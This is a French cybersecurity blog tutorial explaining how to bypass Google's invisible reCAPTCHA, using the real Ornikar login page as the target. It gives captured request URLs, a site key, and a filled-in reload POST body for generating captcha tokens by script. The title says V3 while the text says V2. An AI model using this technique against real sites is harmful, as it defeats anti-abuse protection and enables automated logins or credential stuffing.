<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    










    







<script defer language="javascript" type="text/javascript" src="/js/bundle.min.145453261a7755f5042a854c4213501d215a8fbe34c08d181c40f803f1315e74.js"></script>






    
    <meta http-equiv="content-type" content="text/html; charset=utf-8">

    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    
    <link rel="icon" href=/images/favicon.png>

    
    





  





  
  
  


<!-- Open Graph image and Twitter Card metadata -->

<title itemprop="name">Vozec&#39;s Blog - Comment Bypass un Silent Recaptcha V3</title>
<meta property="og:title" content=Vozec&#39;s&#32;Blog&#32;-&#32;Comment&#32;Bypass&#32;un&#32;Silent&#32;Recaptcha&#32;V3 />
<meta name="twitter:title" content=Vozec&#39;s&#32;Blog&#32;-&#32;Comment&#32;Bypass&#32;un&#32;Silent&#32;Recaptcha&#32;V3 />
<meta itemprop="name" content=Vozec&#39;s&#32;Blog&#32;-&#32;Comment&#32;Bypass&#32;un&#32;Silent&#32;Recaptcha&#32;V3 />
<meta name="application-name" content=Vozec&#39;s&#32;Blog&#32;-&#32;Comment&#32;Bypass&#32;un&#32;Silent&#32;Recaptcha&#32;V3 />
<meta property="og:site_name" content="" />


<meta name="description" content="Comment contourner la sécurité Recaptcha de google" />
<meta itemprop="description" content="Comment contourner la sécurité Recaptcha de google" />
<meta property="og:description" content="Comment contourner la sécurité Recaptcha de google" />
<meta name="twitter:description" content="Comment contourner la sécurité Recaptcha de google" />


<base href="//localhost:1313/posts/les-captchas-sont-inutiles-part1/" />
<link rel="canonical" href="//localhost:1313/posts/les-captchas-sont-inutiles-part1/" itemprop="url" />
<meta name="url" content="//localhost:1313/posts/les-captchas-sont-inutiles-part1/" />
<meta name="twitter:url" content="//localhost:1313/posts/les-captchas-sont-inutiles-part1/" />
<meta property="og:url" content="//localhost:1313/posts/les-captchas-sont-inutiles-part1/" />


<meta property="og:updated_time" content="2021-10-27T12:00:00Z" />


<link rel="sitemap" type="application/xml" title="Sitemap" href='//localhost:1313/sitemap.xml' />

<meta name="robots" content="index,follow" />
<meta name="googlebot" content="index,follow" />


<meta name="twitter:site" content="https://twitter.com/Vozec1" />
<meta name="twitter:creator" content="https://twitter.com/Vozec1" />
<meta property="fb:admins" content="" />


<meta name="apple-mobile-web-app-title" content="" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />






<meta name="generator" content="Hugo 0.134.1">


    
    

<link type="text/css" rel="stylesheet" href="/css/bundle.min.94a339836f89f0d25f31980cb6b0631da21e20af128308747ce44e0525eb16ef.css">


    
    <style>
    body {
        --sidebar-bg-color: #202020;
        --sidebar-img-border-color: #515151;
        --sidebar-p-color: #909090;
        --sidebar-h1-color: #FFF;
        --sidebar-a-color: #FFF;
        --sidebar-socials-color: #FFF;
        --text-color: #222;
        --bkg-color: #FAF9F6;
        --post-title-color: #303030;
        --list-color: #5A5A5A;
        --link-color: #268BD2;
        --date-color: #515151;
        --table-border-color: #E5E5E5;
        --table-stripe-color: #F9F9F9;
        --code-color: #000;
        --code-background-color: #E5E5E5;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
        --moon-sun-color: #FFF;
        --moon-sun-background-color: #515151;
    }
    body.dark-theme {
        --text-color: #EEE;
        --bkg-color: #121212;
        --post-title-color: #DBE2E9;
        --list-color: #9D9D9D;
        --link-color: #268BD2;
        --date-color: #9A9A9A;
        --table-border-color: #515151;
        --table-stripe-color: #202020;
        --code-color: #FFF;
        --code-background-color: #515151;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
    }
    body {
        background-color: var(--bkg-color);
    }
</style>

</head>

    <body class="dark-theme">
        <div class="wrapper">
            <aside class="sidebar">
    <div class="container sidebar-sticky">
        <div class="light-dark" align="right">
    <button class="btn-light-dark" title="Toggle light/dark mode">
        <svg class="moon" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M6 .278a.768.768 0 0 1 .08.858a7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277c.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316a.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71C0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"/>
        </svg>
        <svg class="sun" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M8 12a4 4 0 1 0 0-8a4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"/>
        </svg>
    </button>
</div>

        <div class="sidebar-about">
    <h1 class="brand">
        
            <a href="//localhost:1313/">
                <img src="https://avatars.githubusercontent.com/u/61807609?v=4" alt="brand image">
            </a>
        
        
            <a href="//localhost:1313/">
                <h1>Vozec&#39;s Blog</h1>
            </a>
        
    </h1>
    <p class="lead">
    A student passionate about cybersecurity
    </p>
</div>

        <nav>
    <ul class="sidebar-nav">

        
        
        
        
            

            
                
                
                    <li class="heading">
                        <a href="/about/">About</a>
                    </li>
                    
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
                    <li class="heading">
                        <a href="/writeups/">Writeups</a>
                    </li>
                    
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
                    <li class="heading">
                        <a href="/researchs/">Researchs</a>
                    </li>
                    
                
            
                
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
                    <li class="heading">
                        <a href="/rsa/">1/ Crypto RSA</a>
                    </li>
                    
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
                    <li class="heading">
                        <a href="/aes/">2/ Crypto AES</a>
                    </li>
                    
                
            
                
                
            
                
                
            
                
                
            
                
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
            
                
                
                    <li class="heading">
                        <a href="/other/">3/ Crypto Other</a>
                    </li>
                    
                
            
                
                
            
                
                
            
                
                
            
                
                
            
            
                
                
                        
                
                        
                
                        
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        

    </ul>
</nav>

        
    <a target="_blank" class="social" title="GitHub" href="https://github.com/Vozec">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="-2 -2 24 24">
            <path fill="currentColor" d="M18.88 1.099C18.147.366 17.265 0 16.233 0H3.746C2.714 0 1.832.366 1.099 1.099C.366 1.832 0 2.714 0 3.746v12.487c0 1.032.366 1.914 1.099 2.647c.733.733 1.615 1.099 2.647 1.099H6.66c.19 0 .333-.007.429-.02a.504.504 0 0 0 .286-.169c.095-.1.143-.245.143-.435l-.007-.885c-.004-.564-.006-1.01-.006-1.34l-.3.052c-.19.035-.43.05-.721.046a5.555 5.555 0 0 1-.904-.091a2.026 2.026 0 0 1-.872-.39a1.651 1.651 0 0 1-.572-.8l-.13-.3a3.25 3.25 0 0 0-.41-.663c-.186-.243-.375-.407-.566-.494l-.09-.065a.956.956 0 0 1-.17-.156a.723.723 0 0 1-.117-.182c-.026-.061-.004-.111.065-.15c.07-.04.195-.059.378-.059l.26.04c.173.034.388.138.643.311a2.1 2.1 0 0 1 .631.677c.2.355.44.626.722.813c.282.186.566.28.852.28c.286 0 .533-.022.742-.065a2.59 2.59 0 0 0 .585-.196c.078-.58.29-1.028.637-1.34a8.907 8.907 0 0 1-1.333-.234a5.314 5.314 0 0 1-1.223-.507a3.5 3.5 0 0 1-1.047-.872c-.277-.347-.505-.802-.683-1.365c-.177-.564-.266-1.215-.266-1.952c0-1.049.342-1.942 1.027-2.68c-.32-.788-.29-1.673.091-2.652c.252-.079.625-.02 1.119.175c.494.195.856.362 1.086.5c.23.14.414.257.553.352a9.233 9.233 0 0 1 2.497-.338c.859 0 1.691.113 2.498.338l.494-.312a6.997 6.997 0 0 1 1.197-.572c.46-.174.81-.221 1.054-.143c.39.98.424 1.864.103 2.653c.685.737 1.028 1.63 1.028 2.68c0 .737-.089 1.39-.267 1.957c-.177.568-.407 1.023-.689 1.366a3.65 3.65 0 0 1-1.053.865c-.42.234-.828.403-1.223.507a8.9 8.9 0 0 1-1.333.235c.45.39.676 1.005.676 1.846v3.11c0 .147.021.266.065.357a.36.36 0 0 0 .208.189c.096.034.18.056.254.064c.074.01.18.013.318.013h2.914c1.032 0 1.914-.366 2.647-1.099c.732-.732 1.099-1.615 1.099-2.647V3.746c0-1.032-.367-1.914-1.1-2.647z"/>
        </svg>
    </a>



    <a target="_blank" class="social" title="LinkedIn" href="https://www.linkedin.com/in/arthur-dlfr/">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 448 512">
            <path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5c0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7c-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5c67.2 0 79.7 44.3 79.7 101.9V416z"/>
        </svg>
    </a>


    <a target="_blank" class="social" title="Twitter" href="https://twitter.com/Vozec1">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M5.032 14.286c6.037 0 9.34-4.837 9.34-9.032c0-.137 0-.274-.01-.41A6.56 6.56 0 0 0 16 3.2c-.6.256-1.235.425-1.885.5a3.207 3.207 0 0 0 1.443-1.757c-.645.37-1.35.63-2.085.77a3.322 3.322 0 0 0-1.862-.958a3.384 3.384 0 0 0-2.082.334a3.223 3.223 0 0 0-1.442 1.49a3.08 3.08 0 0 0-.208 2.03a9.57 9.57 0 0 1-3.747-.963a9.269 9.269 0 0 1-3.018-2.354a3.086 3.086 0 0 0-.36 2.314c.189.787.68 1.475 1.376 1.924a3.344 3.344 0 0 1-1.49-.398v.04c0 .734.263 1.444.743 2.01a3.3 3.3 0 0 0 1.89 1.102c-.483.128-.99.146-1.482.055a3.19 3.19 0 0 0 1.168 1.577a3.36 3.36 0 0 0 1.9.627A6.732 6.732 0 0 1 0 12.86a9.527 9.527 0 0 0 5.032 1.423"/>
        </svg>
    </a>




    <a target="_blank" class="social" title="Discord" href="vozec">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="0 0 24 24">
            <path fill="currentColor" d="M19.27 5.33C17.94 4.71 16.5 4.26 15 4a.09.09 0 0 0-.07.03c-.18.33-.39.76-.53 1.09a16.09 16.09 0 0 0-4.8 0c-.14-.34-.35-.76-.54-1.09c-.01-.02-.04-.03-.07-.03c-1.5.26-2.93.71-4.27 1.33c-.01 0-.02.01-.03.02c-2.72 4.07-3.47 8.03-3.1 11.95c0 .02.01.04.03.05c1.8 1.32 3.53 2.12 5.24 2.65c.03.01.06 0 .07-.02c.4-.55.76-1.13 1.07-1.74c.02-.04 0-.08-.04-.09c-.57-.22-1.11-.48-1.64-.78c-.04-.02-.04-.08-.01-.11c.11-.08.22-.17.33-.25c.02-.02.05-.02.07-.01c3.44 1.57 7.15 1.57 10.55 0c.02-.01.05-.01.07.01c.11.09.22.17.33.26c.04.03.04.09-.01.11c-.52.31-1.07.56-1.64.78c-.04.01-.05.06-.04.09c.32.61.68 1.19 1.07 1.74c.03.01.06.02.09.01c1.72-.53 3.45-1.33 5.25-2.65c.02-.01.03-.03.03-.05c.44-4.53-.73-8.46-3.1-11.95c-.01-.01-.02-.02-.04-.02zM8.52 14.91c-1.03 0-1.89-.95-1.89-2.12s.84-2.12 1.89-2.12c1.06 0 1.9.96 1.89 2.12c0 1.17-.84 2.12-1.89 2.12zm6.97 0c-1.03 0-1.89-.95-1.89-2.12s.84-2.12 1.89-2.12c1.06 0 1.9.96 1.89 2.12c0 1.17-.83 2.12-1.89 2.12z"/>
        </svg>
    </a>










    <a target="_blank" class="social" title="Email" href="https://www.root-me.org/Vozec">
       <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 485.211 485.211">
            <path fill="currentColor" d="M301.393,241.631L464.866,424.56H20.332l163.474-182.928l58.801,51.443L301.393,241.631z M462.174,60.651H23.027 l219.579,192.142L462.174,60.651z M324.225,221.67l160.986,180.151V80.792L324.225,221.67z M0,80.792v321.029L160.972,221.64 L0,80.792z"/>
       </svg>
    </a>


        <p class="footnote">
powered by <a target="_blank" href="https://gohugo.io">Hugo</a> | themed with <a target="_blank" href="https://github.com/lukeorth/poison">poison</a>
    <br>
    &copy; 2024 . All rights reserved.
</p>

  </div>
</aside>

            <main class="content container">
                <div class="post">
  <div class="info">
  <h1 class="post-title">
    <a href="//localhost:1313/posts/les-captchas-sont-inutiles-part1/">Comment Bypass un Silent Recaptcha V3</a>
  </h1>

  <div class="headline">
    <div>
      
      <time datetime=" 2021-10-27T12:00:00Z" class="post-date">
        October 27, 2021
      </time>
      
      <span> - </span>
      <span class="reading-time">
        
          
        

        <span>3 mins read</span>
      </span>
    </div>

    
    <ul class="tags">
      
      <li class="tag-bypass">
        <a href="//localhost:1313/tags/bypass">bypass</a>
      </li>
      
      <li class="tag-tuto">
        <a href="//localhost:1313/tags/tuto">tuto</a>
      </li>
      
    </ul>
    
  </div>

  
  

  
</div>

  <h2 id="introduction">Introduction</h2>
<p>Les Captchas sont des petits programmes web qui servent à déterminer si leur interlocuteur est un humain ou un robot. Ce n&rsquo;est généralement pas dérangeant pour les gens normaux mais cela devient ennuyeux pour les développeur qui souhaitent faire du scraping web ou juste se connecter à un service depuis le site-Web.
Dans cet article nous allons nous concentrer sur les recaptchas de google et particulièrement ceux en mode <strong>Silent</strong> en version 2</p>
<p><img src="./img/meme1.gif" alt="Alt text" title="meme1"></p>
<h2 id="reconnaissance">Reconnaissance</h2>
<p>Ce type de recaptcha est composé de 2 requêtes :
La première étant un <em>GET</em> de cette forme :</p>
<p><code>https://www.google.com/recaptcha/api2/anchor?ar=1&amp;k=6LcEN9EUAAAAAAuC_ndHLJkvdHXAp-pOYURWOMG5&amp;co=aHR0cHM6Ly93d3cub3JuaWthci5jb206NQQz&amp;hl=fr&amp;v=UrRmT3mBwY326qQxUfVlHR1P&amp;size=invisible&amp;cb=cmpxv7ihx8lo</code></p>
<p>La seconde , une requête <em>POST</em> :</p>
<p><code>https://www.google.com/recaptcha/api2/reload?k=6LcEN9EUAAAAAAuC_ndHLJkvdHXAp-pOYURWOMG5 </code></p>
<p>La réponse de cette deuxième requête contient le token captcha qui peut être utilisé pour une requête de connexion.</p>
<h2 id="exemple">Exemple</h2>
<p>Essayons de nous connecter à <a href="https://www.ornikar.com/" target="_blank">Ornikar</a>, un site pour passer le code de la route .
Dans le debugger chrome ou sur d&rsquo;autre logiciel d&rsquo;analyse réseau, on peut voir la requête.</p>
<p>Ici sur <a href="https://www.httpdebugger.com/" target="_blank">HTTPDebugger</a> :</p>
<p><img src="./img/HTTPDebugger.png" alt="Alt text" title="HTTPDebugger"></p>
<p>On retrouve :</p>
<ul>
<li>L&rsquo;url de connection : <a href="https://auth.ornikar.com/api/v1/sign-in?app=learner-webapp" target="_blank">https://auth.ornikar.com/api/v1/sign-in?app=learner-webapp</a></li>
<li>Les Headers : Accept/User-Agent/Content-Type/Origin/Referer &hellip;</li>
<li>Le PostData :</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;email&#34;</span>:<span style="color:#e6db74">&#34;monmaildetest@gmail.com&#34;</span>,<span style="color:#f92672">&#34;password&#34;</span>:<span style="color:#e6db74">&#34;SuperPassword123!&#34;</span>,<span style="color:#f92672">&#34;_token&#34;</span>:<span style="color:#e6db74">&#34;03AGdBq264jO-H4YYmiUhESUbvqL-Jz7YuFfrWL0qln_OC39lOvHZe_w5Aezgsuo7IdNFvz3XeCfeACXZXBBmQHHH_vOUHQcBCpdl1Zv2-TcSHzBcG1EJEilkzd832oRiKwIxkqzGxqdhNf2Rqw3HfBc5LiFqvuYCkEckICWv_q8O8orbVxkp4-zSL3xk47LEqouiGtkk3cyhr4JLX3EIeP8RvO3klf0p7_eHWwHcobX4HISGCwAxBuA5YJotDSalDuNcAYUDpiAlRgf3HR9qBHLD54nPd_9oJqhiLdv0s5q0ZoEsfjwJkMGIjxoV2LoUIBBqXwF8eG_-V5nzGH26ltXNeEqRi-NJuNX40J-D_JMW3EzTLdQ_7GWlPwZXc-Ag6GYsx2jtwGmGafDb3ugK7eC5upbmHTfjNhftaWj3niQyFERTLqHbW96dYRiyklDfgPVhLbWHCUo7ocCe57mpzLdng1wjAznQ&#34;</span>}
</span></span></code></pre></div><p>On remarque les 3 paramètres :</p>
<ul>
<li>email</li>
<li>password</li>
<li>_token</li>
</ul>
<p>Dans notre cas, on ne peut pas se connecter avec un script car nous n&rsquo;avons pas la valeur du token. En effet celle-ci est valide <strong>une fois</strong> par requête .</p>
<p>Il faut donc trouver un moyen de le générer !</p>
<h2 id="bypass">Bypass</h2>
<p><strong>Ce bypass ne marche que pour les recaptcha Silent V2 , si vous voyer une requète avec <a href="https://www.google.com/recaptcha/api2/bframe" target="_blank">https://www.google.com/recaptcha/api2/bframe</a> , ce n&rsquo;est pas la bonne version et ce n&rsquo;est pas bypassable !</strong></p>
<p>Reprenons l&rsquo;exemple précédent.
Actualisons la page et récupérons l&rsquo;url commençant par <code>https://www.google.com/recaptcha/api2/anchor? . . .</code></p>
<p>On peut extraire de l&rsquo;url :</p>
<ul>
<li>ar=1</li>
<li><strong>k=6LcEN9EUAAAAAAuC_ndHLJkvdHXAp-pOYURWOMG5</strong></li>
<li><strong>co=aHR0cHM6Ly93d3cub3JuaWthci5jb206NQQz</strong></li>
<li>hl=fr</li>
<li><strong>v=UrRmT3mBwY326qQxUfVlHR1P</strong></li>
<li>cb=cmpxv7ihx8lo</li>
</ul>
<p>Puis simulons une connexion et récupérerons le PostData de la requête commençant par <code>https://www.google.com/recaptcha/api2/reload?</code></p>
<p>On devrait avoir quelque chose comme ca :</p>
<pre tabindex="0"><code>YhkYx1k-yvvb8OonJPmOpoJYù03AG ...&#34;ä[13,87,82] !IyWgJWjIAAa- ... OfnIrQUUPxAhAHCdFyD_AjxYvI*-2540174922qBsign_inr(6 ... (Trés grand)
</code></pre><p>On peut se rendre compte que le contenu est sérialisé avec protobuff .
Grâce à des plugins de fiddler/BurpSuite; j&rsquo;ai décodé et j&rsquo;en ai crée une Template pour créer un post data pour chaque recaptcha</p>
<p><em>Magie Magie</em> :
<strong>v=()&amp;reason=q&amp;c=&lt;TOKEN&gt;&amp;k=()&amp;co=()&amp;hl=en&amp;size=invisible&amp;chr=()&amp;vh=()&amp;bg=()</strong></p>
<p>A partir du premier url on a déjà :</p>
<ul>
<li>Le <em>V</em></li>
<li>Le <em>k</em></li>
<li>Le <em>co</em></li>
</ul>
<p>Dans le <strong>postdata</strong> on peut extraire la variable <strong>chr</strong>.<br>
Il faut URL encoder la partie qui ressemble à ca : [XX,XX,XX] <em>Dans nôtre exemple de post-data ci-dessus , on aurait :[13,87,82] qui deviendra :</em> <strong>%5B13%2C87%2C82%5D</strong></p>
<p>le <strong>vh</strong> correspond au nombre à la fin du post-data ; ici : <strong>-2540174922</strong> <em>(attention à ne pas oublier le - parfois)</em></p>
<p>Enfin le <strong>BG</strong> et la partie qui commence par <em>!</em> juste après le <em>CHR</em> et qui finit par <strong>*</strong> avant le <em>vh</em></p>
<p>Finalement on a :</p>
<pre tabindex="0"><code>v=UrRmT3mBwY326qQxUfVlHR1P&amp;reason=q&amp;c=&lt;token&gt;&amp;k=6LcEN9EUAAAAAAuC_ndHLJkvdHXAp-pOYURWOMG5&amp;co=aHR0cHM6Ly93d3cub3JuaWthci5jb206NQQz&amp;hl=en&amp;size=invisible&amp;chr=%5B13%2C87%2C82%5D&amp;vh=-2540174922&amp;bg=!IyWgJWjIAAa-OPf7vjhHcCY0RQRzbZk-ACkAIwj8RmjdaFTc0dhDJhieNXGLwJ0e8aBgHQxVNWMSkAxkTNl9AUafuQcAAAC5VwAAAAdtAQecC_cGglx_68zIYp4cbqolrYvI6AmQqOOdrDkvEbirXRRExYfwRNjMaM5zeaFz8zT1BcVrogw2iM2xsFWoDtyg_oAYo0fTVjAO3tBT7-SspdT9ls-my9vzXQcDmyTXERnvClNzlYUnWJW9IpvFlB8sJ6gVVFkPflBftE6olMNeiL7P7thblpaZI-P1jMY3aEVAksn5nhivDIVrM7hnqEPHEfPo3ZIxYLuzkrZ6f79AWb2DMxRI4IwYvdwKHkba2mE9JcfKUTuXIXU0AYbHcyXTnJo_9LUiVeIwsjMrtFD2LeL8FpmICacs8pA1PvNpeOdc_e992xv_b27v7XncL5CfitoMFdagC8br26VLnc0lo7Py7pRXijXj2lchYELIpae86HZULiZN59F1BubDN20EipvN58rUAuLhdERenyXQDv91CLLrzewDHXDzyq6CUCeRerGI5Ga7howOJgRqVH5l4jkvulgA51ARMUQs4hGHRylhFPs5Llz3l-MD4xFAh-GIV3USuBleRO6b3mxrmO2KOYvIfzQpuVTK4kl6356Oziz-BUlQR9jQhkMOv7gyBYNoOlDWNdkN_S_iQ2BzKeJjqfjmuFGQv0UwBbtEsm3ZMido5ulabhbxvJWsfeyARPiieT4F6V9yLzIR4hyBFO6hoXZEpYdaYnWCZRSLmx0hLtUSUzZZq8_Bf99b0BDqvzWa3ukW_0_LC3fhqW5tjGq8Wuwr4dgA1B4SxQpIp4veBp9EB4uA2dCmpu2tHJjSX4Ob77mqdC66U2q_jNnFplRH1tSUXRn0hGaydyMmJJiJhWi91CrydUBZmKl28I-mIHYdLrIxWuJQVQAyZyK4fMKkyNlCaZZEyoaWZkxCxP_Is4tgmjFv3iaOCBwDj9FqwGApbONbd4taeof6AHBllxwf_ODd9e4WKajPsGQyGBvodGGJCPuvNb65w003VK6WDH4Sflzy8rkDH8ktdeCJ3ruhOJ3yCytPtsiC6dzmzV_CZPqervCY9Nfl6MTAAz0NXC6knMnImdqKXxqB3n04qs16naF_2VrUCyc8SH7gHzp0CmLhhYAi91OhZ0lnMmbOdIE9hJFcWDG14uK-8__OSqEGz694sghNGILC689xwPqOJ8PGAtxgMtZOvUjkM6InpZ2KLcsWex1Id9zTtELc-6Eb5mzJpsjKxPkJQ7LZeEpzJmfq8XWh-ZyTVqkQdHklo8Q67kjg75fxf-ICwDAd7tTVr1pX2cA01oGSf3ILPhCgYYCw7r0OYgZyi0G0iBNsZxHdioI4ywAkUxDCJObxFCa3sZrBzt5ZAuoAj2oqnKAz6Pgx8zygnThA1pIhR7qLJ5TnrDAv8sVKVFjTA3eOz3r6BDX9r0GkAnpt_8TQtNR93IvLVKjhSexX9HfKdH0TL97_NdqMwREsxGKF_MtPSHocU7jvg3f1v0SwhF2CrpNmKG2hiUewZ-dpd4jPQlxMgyBYeKtB5XbDExmsQ7wB-1OcLaDpPMp1QiyhpJr5eVuxMD7nTHZY33ysaVWWckLG7vy2fU0Fh5LRMrniLNbblD3mdZxSEHzAYIt_K2dxHSme5TAfhCcd_UznZFEoQ6xhCDEAWO-ILohm8no2eWh4RUkwNst-ei648FHpYQgyWH751-DYtoabXmW6VJF2e6KyUh2fVPISls0fIDC3AKZHmSFBBKIV8900c0Mm5QUe4WT6OuvfD3vfVQCkg811X-iExaismz3YM0LtwkAtoIgfQTrBLSsUCJoL92B8Fk0GYoYw52FWn2TdimUYpR55EDg93onfh20aJgLGRtrSr1crWdsvueM-THylGYl_u8CqW08ipjCYB-YOpnvXQWomqWGBaUX9FNLFt3kDw423k8iL4kFrEM6Fe1K0-dlbcWDuq3qcAwtTLrQyGIgyvCC4IV_nnk-NMzvAV_9WrCohtgxOCtTAUNzmKm15RZ9gd4z7HDx6bYHCNOajVgfE-rYNsWKyEm6OMj37_QeW6WeS4M_1Kdt8fi1LmYOA41v0Zf1ao0q_mYCZt_cPfKph9hFIr8H1Pl6PUXcHZPHInxkQegNMRl3eeCqZPQSLQKudM0l_AH4LTuuy0FvPj7FTg3vHb9YdR_IIM4mLhq3Pg8cmvyFZg0IlS-FyjvSDtgDRIUhSx0Dlu5zCKRhlt9mdllacoKpREdoxtya7fbHzT8QDi1_0ffRmvFogI-KeMNiDqom_pNIWCgnDug-FOuqTPBazUDcz6s3qcYnNwL7KeP0KOe4Sv5cfSI7NZnhmPaYWUSL70QY-ru2sPhOokSSM_GZCaML0x7WZZpToHzDhvt-qX53ozdKOn3Q3hN89c_p8nYmKoANX0oNtcpBH3UXXnGI2JKTp1K0adreZofiSHOUoOWt-rofbz09xlfPxyBaROBagHh9A76xBqN-hc9XX13Iz3Ay07wRpo4g0-glQfefYqw4XWlwT05W86JlEtXhrjVL4wyiXB5lGNRhIIn60a5KAPAHuBPozJ-_9cRZVV2fEt6RGWKg4ZoqIKaI86FpJ4vu0LwBfWN-8tXMgITy7RIftIchmiOvKHiJ_wvOyX_eINSM7yDqkIBOhennKxDXxvBTFosQmJhXnQ2N2PpVE6ItVyEpsY8OjlPGRkeBQnQXHt33UQWjTxN2AqaMq8obP61aIJoHB48wl4MZ2YggLdUrmjd_6_tOBZUco1b7usTatiapSd55iNffk-jVidx7GxokqO7J6QDzPTaA42ZenHeKq95jGDJodg7VDKzrKaQdw1ohbtNEMpMm7ByodbLbNnTyGFqOJ33c